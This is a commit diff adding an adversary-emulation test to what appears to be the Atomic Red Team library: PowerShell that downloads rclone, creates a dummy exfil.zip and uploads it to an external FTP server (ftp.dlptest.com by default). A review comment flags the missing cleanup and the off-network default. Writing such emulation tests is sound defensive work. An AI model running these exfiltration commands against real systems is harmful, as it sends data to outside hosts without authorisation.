Updated T1048.003 to include Rclone (#2202)

* Updated T1048.003 to include Rclone

Added the use of Rclone to exfiltrate data to an external FTP server.

* Updated the test as discussed.

* Fixed the typo

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
BlueTeamOps
2022-11-01 05:58:24 +11:00
committed by GitHub
parent 8c427d03ea
commit a69e08e6ae
@@ -159,3 +159,49 @@ atomic_tests:
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
name: powershell
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
description: |-
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
supported_platforms:
- windows
input_arguments:
ftp_server:
description: Your own ftp server
type: string
default: ftp.dlptest.com
ftp_pass:
description: Your FTP user's password
type: string
default: rNrKYTX9g7z3RgJRmxWuGHbeu
ftp_user:
description: Your FTP username
type: string
default: dlpuser
ftp_port:
description: Your FTP's port
type: string
default: 21
dependency_executor_name: powershell
dependencies:
- description: |
Check if the exfil package exists
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
get_prereq_command: |
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
- description: 'Check if rclone zip exists'
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
executor:
command: |-
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
name: powershell
elevation_required: true
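Review bot: the new test has no `cleanup_command`, so after it runs the host keeps the rclone binary and extracted folder under C:\Users\Public\Downloads, the 20 MB exfil.zip, and an rclone remote named `ftpserver` whose config holds the FTP username and password in the user's rclone.conf. Suggest adding a cleanup step such as `&$rclone_bin config delete ftpserver` followed by removing the rclone zip, the extracted directory and exfil.zip. Two smaller points in the same hunk: the second dependency only checks for the downloaded zip (`rclone-current-windows-amd64.zip`), not for rclone.exe, so if extraction fails `$rclone_bin` is empty and `&$rclone_bin` throws; checking for rclone.exe directly would make the prereq match what the executor needs. And `ftp_server` is described as "Your own ftp server" while its default is the public third-party host ftp.dlptest.com with published credentials, so by default the test sends the package off-network; either change the description to say so or document that users should override it, and since every path is under C:\Users\Public\Downloads nothing here appears to need `elevation_required: true`.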